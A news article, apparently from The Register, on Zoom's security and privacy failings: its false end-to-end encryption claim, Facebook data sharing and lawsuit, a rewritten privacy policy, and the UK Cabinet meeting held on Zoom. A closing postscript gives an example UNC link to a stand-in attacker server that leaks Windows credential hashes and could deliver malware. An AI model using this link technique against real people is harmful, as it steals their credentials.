This article is more than 1 year old

Zoom's end-to-end encryption isn't actually end-to-end at all. Good thing the PM isn't using it for Cabinet calls. Oh, for f...

Super-crypto actually normal TLS, lawsuit launched over Facebook API usage, privacy policy rewritten

UK Prime Minister Boris Johnson sparked security concerns on Tuesday when he shared a screenshot of “the first ever digital Cabinet” on his Twitter feed. It revealed the country’s most senior officials and ministers were using bog-standard Zoom to discuss critical issues facing Blighty.

The tweet also disclosed the Zoom meeting ID was 539-544-323, and fortunately that appears to have been password protected. That's a good thing because miscreants hijacking unprotected Zoom calls is a thing.

Crucially, the use of the Zoom software is likely to have infuriated the security services, while also raising questions about whether the UK government has its own secure video-conferencing facilities. We asked GCHQ, and it told us that it was a Number 10 issue. Downing Street declined to comment.

The decision to use Zoom, as millions of others stuck at home during the coronavirus outbreak are doing, comes as concerns are growing about the conferencing app's business model and security practices.

Most notably, the company has been forced to admit that although it explicitly gives users the option to hold an “end-to-end encrypted” conversation and touts end-to-end encryption as a key feature of its service, in fact it offers no such thing.

Specifically, it uses TLS, which underpins HTTPS website connections and is significantly better than nothing. But it most definitely is not end-to-end encryption (E2E). E2E ensures all communications are encrypted between devices so that not even the organization hosting the service has access to the contents of the connection. With TLS, Zoom can intercept and decrypt video chats and other data.

When we say end-to-end...

Despite Zoom offering a meeting host the option to “enable an end-to-end (E2E) encrypted meeting,” and providing a green padlock that claims “Zoom is using an end to end encrypted connection,” it appears that the company is able to access data in transit along that connection, and can also be compelled to provide it to governments. So, it's not E2E.

People using a Google Jamboard

Yeah, that Zoom app you're trusting with work chatter? It lives with 'vampires feeding on the blood of human data'

READ MORE

While that is not something that will bother most Zoom users, whose conversations are not highly sensitive nor confidential, for something like a UK Cabinet meeting, the lack of true end-to-end encryption is dangerous.

Under questioning, a Zoom spokesperson admitted: “Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.”

Then they gave their own Zoom version of what the phrase “end-to-end encryption” actually means: “When we use the phrase ‘End to End’ in our other literature, it is in reference to the connection being encrypted from Zoom end point to Zoom end point,” a spokesperson told The Intercept on Tuesday.

The use of “end point” in this context refers to Zoom servers, not just Zoom clients; a second layer of purposefully misleading semantics.

So when we say user privacy...

That’s not the only area where Zoom has been found wanting. As a spotlight has swung on the biz thanks to its enormous take-up in recent weeks, its dodgy data sharing policies were also revealed.

As we reported earlier this month, Zoom granted itself the right to mine your personal data and conference calls to target you with ads, and seemed to have a "creepily chummy" relationship with tracking-based advertisers.

Personal information gathered by the company included, but was not limited to, names, addresses and any other identifying data, job titles and employers, Facebook profiles, and device specifications. It also included "the content contained in cloud recordings, and instant messages, files, whiteboards ... shared while using the service."

In other words, it was, arguably, the Facebook of the video-conferencing world, sucking every piece of data it can from you and any device you install it on.

Speaking of Facebook, Zoom's iOS app sent analytics data to Facebook even if you didn't use Facebook to sign into Zoom, due to the application's use of the social network's Graph API, Vice discovered. The privacy policy stated the software collects profile information when a Facebook account is used to sign into Zoom, though it didn't say anything about what happens if you don't use Facebook. Zoom has since corrected its code to not send analytics to the social network if you don't use it to sign into the video-conferencing app.

Zoom also stupidly glomed users together, as if they were working for the same company, because they used a common email provider, such as xs4all.nl.

Privacy advocacy group Access Now, meanwhile, dug into Zoom’s privacy policy and practices and didn't like what it saw, sending a letter to the company on March 19 asking it to publish a transparency report along the same lines as other companies that made it plain exactly what the company was doing with its users’ data.

“The growing demand for Zoom’s services makes it a target for third parties, from law enforcement to malicious hackers, seeking personal data and sensitive information,” said Access Now’s general counsel Peter Micek. “This is why just disclosing privacy policies is not enough – it’s high time for Zoom to tell us how they protect our personal lives and professional activities from exploitation. This starts with a regular transparency report.”

The Facebook API kerfuffle resulted in a lawsuit [PDF], filed on Monday in California. The plaintiff in this case, Robert Cullen of Sacramento, California, is looking to bring a class action against Zoom for failing to protect personal data.

He argued Zoom has violated three Californian laws: the Unfair Competition Law, Consumers Legal Remedies Act, and Consumer Privacy Act by collecting and providing personal information to third parties including Facebook.

“Had Zoom informed its users that it would use inadequate security measures and permit unauthorized third-party tracking of their personal information, users would not have been willing to use the Zoom app,” the lawsuit argued.

In short, while Zoom’s ease of use, reliability and excellent user interface has made it a godsend for people stuck at home, the company continues to raise red flags about its honesty, its privacy policies and its business model. Something that a country’s head of government would do well to consider before posting screengrabs of online meetings. ®

Stop press... Zoom has quietly rewritten its privacy policy since our earlier coverage to now stress: "We do not sell your personal data. Whether you are a business or a school or an individual user, we do not sell your data."

It continued: "Your meetings are yours. We do not monitor them or even store them after your meeting is done unless we are requested to record and store them by the meeting host ... We do not use data we obtain from your use of our services, including your meetings, for any advertising. We do use data we obtain from you when you visit our marketing websites, such as zoom.us and zoom.com. You have control over your own cookie settings when visiting our marketing websites."

It, thus, appears to have clarified, among other things, that it, at least now, does not use the content of meetings and messages to generate targeted advertising.

PS: Zoom has an attention-tracking feature, which can be turned on by a meeting host, that alerts the host if you click away from the Zoom conference for more than 30 seconds.

PPS: It appears you can snaffle people's Windows local login usernames and hashed passwords via Zoom by getting them to click on a URL in a chat message that connects to a malicious SMB file server. A link such as \\evil.server.com\foorbar.jpg will, when clicked on, cause Windows to connect to evil.server.com, supplying the logged-in user's credentials in hope of fetching foobar.jpg. Swap foobar.jpg for malware.exe and you could get code execution on the victim's computer.

More about

TIP US OFF

Send us news


Other stories you might like